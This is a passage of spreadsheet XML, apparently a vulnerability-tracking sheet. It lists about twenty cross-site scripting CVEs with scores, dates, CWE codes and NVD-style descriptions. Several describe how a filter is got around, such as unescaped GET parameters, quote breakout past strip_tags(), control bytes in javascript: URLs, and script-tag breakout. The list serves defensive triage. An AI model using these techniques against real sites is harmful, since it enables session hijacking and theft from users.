      <c r="D1637" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1637" s="5" t="inlineStr"/>
      <c r="F1637" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1637" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1637" s="5" t="inlineStr"/>
      <c r="I1637" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1637" s="5" t="inlineStr"/>
      <c r="K1637" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1637" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS) vulnerability in the DNS lookup/management component of oPanel before v1.20.25 allows remote attackers to execute arbitrary JavaScript and perform session hijacking via a crafted DNS TXT record</t>
        </is>
      </c>
      <c r="M1637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50980</t>
        </is>
      </c>
    </row>
    <row r="1638">
      <c r="A1638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52232</t>
        </is>
      </c>
      <c r="C1638" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1638" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1638" s="5" t="inlineStr"/>
      <c r="F1638" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1638" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1638" s="5" t="inlineStr"/>
      <c r="I1638" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1638" s="5" t="inlineStr"/>
      <c r="K1638" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1638" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the /logo.asp component of FS Inc S3150-8T2F Switch 2.2.0D Build 118101 allows attackers to execute arbitrary Javascript in the context of the victim's browser via a crafted URL.</t>
        </is>
      </c>
      <c r="M1638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52232</t>
        </is>
      </c>
    </row>
    <row r="1639">
      <c r="A1639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52370</t>
        </is>
      </c>
      <c r="C1639" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1639" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1639" s="5" t="inlineStr"/>
      <c r="F1639" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1639" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1639" s="5" t="inlineStr"/>
      <c r="I1639" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1639" s="5" t="inlineStr"/>
      <c r="K1639" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1639" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the Forum posting function of O2OA v10 allows attackers to execute arbitrary Javascript in the context of the victim's browser via a crafted URL.</t>
        </is>
      </c>
      <c r="M1639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52370</t>
        </is>
      </c>
    </row>
    <row r="1640">
      <c r="A1640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52773</t>
        </is>
      </c>
      <c r="C1640" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1640" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1640" s="5" t="inlineStr"/>
      <c r="F1640" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1640" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H1640" s="5" t="inlineStr"/>
      <c r="I1640" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1640" s="5" t="inlineStr"/>
      <c r="K1640" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="L1640" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.1.0 to before version 4.6.6, YesWiki's archived-revision view reflects the time GET parameter into a hidden HTML input in handlers/page/show.php without escaping. Because MySQL coerces malformed DATETIME strings, an attacker can append HTML or JavaScript to a valid archived revision timestamp, still load that archived revision, and execute arbitrary JavaScript in the victim's browser. The vulnerable form is only rendered when the victim can both read and edit the target page. In restricted deployments this requires a victim with read and write access to that page. On a default doryphore 4.6.5 install, public pages such as PagePrincipale were editable anonymously during validation, so the issue can also affect unauthenticated visitors in that configuration. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M1640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52773</t>
        </is>
      </c>
    </row>
    <row r="1641">
      <c r="A1641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52774</t>
        </is>
      </c>
      <c r="C1641" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1641" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1641" s="5" t="inlineStr"/>
      <c r="F1641" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1641" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1641" s="5" t="inlineStr"/>
      <c r="I1641" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1641" s="5" t="inlineStr"/>
      <c r="K1641" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="L1641" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki's Bazar widget handler reflects the id GET parameter into HTML attributes using strip_tags() only. Because strip_tags() does not escape double quotes, an attacker can break out of the attribute value, inject an event handler such as onmouseover, and execute arbitrary JavaScript in the victim's browser. This issue is reachable without authentication. During validation, the vulnerable widget route returned the injected HTML for both /HomePage/widget?id=... and /NoSuchPage/widget?id=..., which shows that no login, no page ownership, no edit rights, and not even a valid page tag were required. The only routing prerequisite observed was that the Bazar extension is enabled and the request includes an id parameter. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M1641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52774</t>
        </is>
      </c>
    </row>
    <row r="1642">
      <c r="A1642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55087</t>
        </is>
      </c>
      <c r="C1642" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1642" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1642" s="5" t="inlineStr"/>
      <c r="F1642" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1642" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1642" s="5" t="inlineStr"/>
      <c r="I1642" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1642" s="5" t="inlineStr"/>
      <c r="K1642" s="5" t="inlineStr">
        <is>
          <t>CWE-444, CWE-601, CWE-79</t>
        </is>
      </c>
      <c r="L1642" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. From 2.1.0 until 3.1.0, Etherpad uses the attacker-controlled x-proxy-path request header in src/node/hooks/express/admin.ts when substituting paths into HTML, JavaScript, and CSS under /admin without sanitization, Vary: x-proxy-path, or Cache-Control: private, no-store. A shared proxy or CDN can cache the resulting response and serve attacker-injected script to an administrator. In src/node/hooks/express/specialpages.ts, version 3.0.0 also accepts a protocol-relative x-proxy-path value when constructing the /p/:pad/timeslider redirect, allowing redirection to an attacker-controlled host. The issues are exploitable when the deployment permits client-supplied x-proxy-path headers to reach Etherpad. This issue is fixed in version 3.1.0.</t>
        </is>
      </c>
      <c r="M1642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55087</t>
        </is>
      </c>
    </row>
    <row r="1643">
      <c r="A1643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61526</t>
        </is>
      </c>
      <c r="C1643" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1643" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1643" s="5" t="inlineStr"/>
      <c r="F1643" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1643" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1643" s="5" t="inlineStr"/>
      <c r="I1643" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1643" s="5" t="inlineStr"/>
      <c r="K1643" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1643" s="5" t="inlineStr">
        <is>
          <t>AdonisJS HTTP Server is a package for handling HTTP requests in the AdonisJS framework. In versions 8.0.0-next.0 through 8.2.0 and 9.0.0 through 9.0.2, the  error.message is interpolated into the default HTML exception response without escaping, allowing a crafted missing-route URL to execute attacker-controlled JavaScript when a victim opens it and no custom status page or JSON response handles the error. When debug mode is disabled and no custom status page handles the error, the default HTML renderer interpolates error.message directly into an HTML response. This issue is fixed in versions 8.2.1 and 9.1.0.</t>
        </is>
      </c>
      <c r="M1643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61526</t>
        </is>
      </c>
    </row>
    <row r="1644">
      <c r="A1644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63670</t>
        </is>
      </c>
      <c r="C1644" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1644" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1644" s="5" t="inlineStr"/>
      <c r="F1644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1644" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1644" s="5" t="inlineStr"/>
      <c r="I1644" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1644" s="5" t="inlineStr"/>
      <c r="K1644" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1644" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. Prior to 2.17.6, sanitizeHtml() can pass disallowed executable markup through packages/sanitize-html/index.js when textarea or xmp is included in allowedTags because a literal solidus after the raw-text end-tag name is treated as text by htmlparser2 and the ontext handler emits that content without escaping, while a browser parses the following img onerror markup as active HTML. This issue is fixed in version 2.17.6.</t>
        </is>
      </c>
      <c r="M1644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63670</t>
        </is>
      </c>
    </row>
    <row r="1645">
      <c r="A1645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71478</t>
        </is>
      </c>
      <c r="C1645" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1645" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1645" s="5" t="inlineStr"/>
      <c r="F1645" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1645" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1645" s="5" t="inlineStr"/>
      <c r="I1645" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1645" s="5" t="inlineStr"/>
      <c r="K1645" s="5" t="inlineStr">
        <is>
          <t>CWE-692, CWE-79, CWE-86</t>
        </is>
      </c>
      <c r="L1645" s="5" t="inlineStr">
        <is>
          <t>league/commonmark is a PHP library for parsing and rendering CommonMark Markdown. From 1.5.0 until 2.9.0, the AttributesExtension's href and src unsafe-link filter can be bypassed by embedding control bytes, such as a tab, carriage return, line feed, or leading C0 control character, in a javascript: URL that browsers discard before parsing the scheme, causing the browser to still execute the script even when the unsafe-link filter is enabled. This issue is fixed in 2.9.0.</t>
        </is>
      </c>
      <c r="M1645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71478</t>
        </is>
      </c>
    </row>
    <row r="1646">
      <c r="A1646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73084</t>
        </is>
      </c>
      <c r="C1646" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1646" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1646" s="5" t="inlineStr"/>
      <c r="F1646" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1646" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1646" s="5" t="inlineStr"/>
      <c r="I1646" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1646" s="5" t="inlineStr"/>
      <c r="K1646" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L1646" s="5" t="inlineStr">
        <is>
          <t>Activepieces is an open source AI workflow automation platform. Prior to 0.83.0, the /api/redirect OAuth callback endpoint embeds the user-supplied code query parameter directly into an inline script block without proper escaping. A crafted request to /api/redirect with a malicious code value can break out of the script context and execute arbitrary JavaScript in the Activepieces origin when a logged-in user opens it. An unauthenticated attacker can access the victim's session tokens or make authenticated API calls on the victim's behalf. This issue is fixed in version 0.83.0.</t>
        </is>
      </c>
      <c r="M1646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73084</t>
        </is>
      </c>
    </row>
    <row r="1647">
      <c r="A1647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75170</t>
        </is>
      </c>
      <c r="C1647" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1647" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1647" s="5" t="inlineStr"/>
      <c r="F1647" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1647" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1647" s="5" t="inlineStr"/>
      <c r="I1647" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1647" s="5" t="inlineStr"/>
      <c r="K1647" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1647" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting (XSS) vulnerability in the /loginController/doLogin endpoint of the HubCore platform (version 14.1.1) allows a remote unauthenticated attacker to inject arbitrary JavaScript into the application's response via the language POST parameter.</t>
        </is>
      </c>
      <c r="M1647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75170</t>
        </is>
      </c>
    </row>
    <row r="1648">
      <c r="A1648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76002</t>
        </is>
      </c>
      <c r="C1648" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1648" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1648" s="5" t="inlineStr"/>
      <c r="F1648" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1648" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1648" s="5" t="inlineStr"/>
      <c r="I1648" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1648" s="5" t="inlineStr"/>
      <c r="K1648" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1648" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.</t>
        </is>
      </c>
      <c r="M1648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76002</t>
        </is>
      </c>
    </row>
    <row r="1649">
      <c r="A1649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79419</t>
        </is>
      </c>
      <c r="C1649" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1649" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1649" s="5" t="inlineStr"/>
      <c r="F1649" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1649" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1649" s="5" t="inlineStr"/>
      <c r="I1649" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1649" s="5" t="inlineStr"/>
      <c r="K1649" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1649" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability exists in EMX Tecnologia Gestao X Business Suite 8.4 and earlier. The vulnerability is caused by insufficient validation and sanitization of the mensagem parameter in the /Configuracao/Imagens.aspx endpoint, allowing an authenticated attacker to inject arbitrary JavaScript code that is reflected and executed in the context of a victim's browser.</t>
        </is>
      </c>
      <c r="M1649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79419</t>
        </is>
      </c>
    </row>
    <row r="1650">
      <c r="A1650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80180</t>
        </is>
      </c>
      <c r="C1650" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1650" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1650" s="5" t="inlineStr"/>
      <c r="F1650" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1650" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1650" s="5" t="inlineStr"/>
      <c r="I1650" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1650" s="5" t="inlineStr"/>
      <c r="K1650" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1650" s="5" t="inlineStr">
        <is>
          <t>Stored XSS via markdown HTML processing in Apache Allura.
This issue affects Apache Allura: from through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80180</t>
        </is>
      </c>
    </row>
    <row r="1651">
      <c r="A1651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80190</t>
        </is>
      </c>
      <c r="C1651" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1651" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1651" s="5" t="inlineStr"/>
      <c r="F1651" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1651" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1651" s="5" t="inlineStr"/>
      <c r="I1651" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1651" s="5" t="inlineStr"/>
      <c r="K1651" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1651" s="5" t="inlineStr">
        <is>
          <t>Apache Allura: stored XSS via SVN code repositories.  Git repositories are not known to be affected.  The vulnerability is likely mitigated via default CSP headers.
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80190</t>
        </is>
      </c>
    </row>
    <row r="1652">
      <c r="A1652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84369</t>
        </is>
      </c>
      <c r="C1652" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1652" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1652" s="5" t="inlineStr"/>
      <c r="F1652" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1652" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1652" s="5" t="inlineStr"/>
      <c r="I1652" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1652" s="5" t="inlineStr"/>
      <c r="K1652" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1652" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 1.0.0 until versions 2.8.4, 3.3.5, and 4.1.0, the opt-in removeScripts plugin, named removeScriptElement in versions 2 and 3 and implemented in plugins/removeScripts.js, removes SVG and XHTML script elements but does not inspect executable HTML content inside SVG foreignObject elements. Event-handler attributes such as onload and onbeforetoggle, srcdoc documents, and executable URLs in the action, data, formaction, href, and src attributes can remain in attacker-controlled SVG input. When an application uses the plugin as its only protection and serves the optimized SVG in an active browser context, the payload can execute script in the viewer's origin, expose data, modify content, or perform actions as the victim. This issue is fixed in versions 2.8.4, 3.3.5, and 4.1.0.</t>
        </is>
      </c>
      <c r="M1652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t>
        </is>
      </c>
    </row>
    <row r="1653">
      <c r="A1653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8447</t>
        </is>
      </c>
      <c r="C1653" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1653" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1653" s="5" t="inlineStr"/>
      <c r="F1653" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1653" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1653" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1653" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1653" s="5" t="inlineStr"/>
      <c r="K1653" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1653" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 suffer from a stored cross-site scripting vulnerability in the Playground chat interface.</t>
        </is>
      </c>
      <c r="M1653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8447</t>
        </is>
      </c>
    </row>
    <row r="1654">
      <c r="A1654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85227</t>
        </is>
      </c>
      <c r="C1654" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1654" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1654" s="5" t="inlineStr"/>
      <c r="F1654" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1654" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1654" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I1654" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1654" s="5" t="inlineStr"/>
      <c r="K1654" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1654" s="5" t="inlineStr">
        <is>
          <t>MISP contains a reflected Cross-Site Scripting (XSS) vulnerability in the event attribute filtering query builder. The taggedAttributes and galaxyAttachedAttributes URL parameters were inserted into the query-builder rules without HTML escaping before being serialized as JSON and embedded inside a &lt;script&gt; element.
Because JsonTool::encode() uses JSON_UNESCAPED_SLASHES, an attacker-controlled value containing a closing &lt;/script&gt; sequence could terminate the surrounding script element and inject arbitrary HTML or JavaScript. For example, a specially crafted viewEventAttributes URL could contain malicious content in one of the affected filter parameters.
An attacker could exploit the vulnerability by convincing an authenticated MISP user to follow a crafted URL. Successful exploitation would execute attacker-controlled JavaScript in the security context of the MISP instance and with the privileges of the victim's authenticated browser session. This could allow access to information available to the victim, modification of data through authenticated requests, or other actions permitted by the victim's MISP permissions.
The vulnerability is addressed by applying HTML escaping with h() to both scalar and array values before they are inserted into the DOM.</t>
        </is>
      </c>
      <c r="M1654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85227</t>
        </is>
      </c>
    </row>
    <row r="1655">
      <c r="A1655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85229</t>
        </is>
      </c>
      <c r="C1655" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1655" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1655" s="5" t="inlineStr"/>
      <c r="F1655" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1655" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1655" s="5" t="inlineStr"/>
      <c r="I1655" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1655" s="5" t="inlineStr"/>
      <c r="K1655" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1655" s="5" t="inlineStr">
        <is>
          <t>** UNSUPPORTED WHEN ASSIGNED ** Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Apache SkyWalking Booster UI.
This issue affects Apache SkyWalking UI : from 10.2.0 through 10.4.0.
Users are recommended to upgrade to Horizon UI 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85229</t>
        </is>
      </c>
    </row>
    <row r="1656">
      <c r="A1656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85484</t>
        </is>
      </c>
      <c r="C1656" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1656" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1656" s="5" t="inlineStr"/>
      <c r="F1656" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1656" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1656" s="5" t="inlineStr"/>
      <c r="I1656" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1656" s="5" t="inlineStr"/>
      <c r="K1656" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1656" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410002 for Perl render option group labels and radio button labels into HTML without escaping.
The Select, RadioGroup, CheckboxGroup and HorizCheckboxGroup widgets render a group label unescaped, Select into a label attribute and the other three into element content. RadioGroup also renders each radio button's own label unescaped.
Any application whose option list is built from data rather than literals, using options_from, an options_fieldname method, or the DBIC model, allows attacker-influenced text in a label that can override the options or embed JavaScript in rendered pages.</t>
        </is>
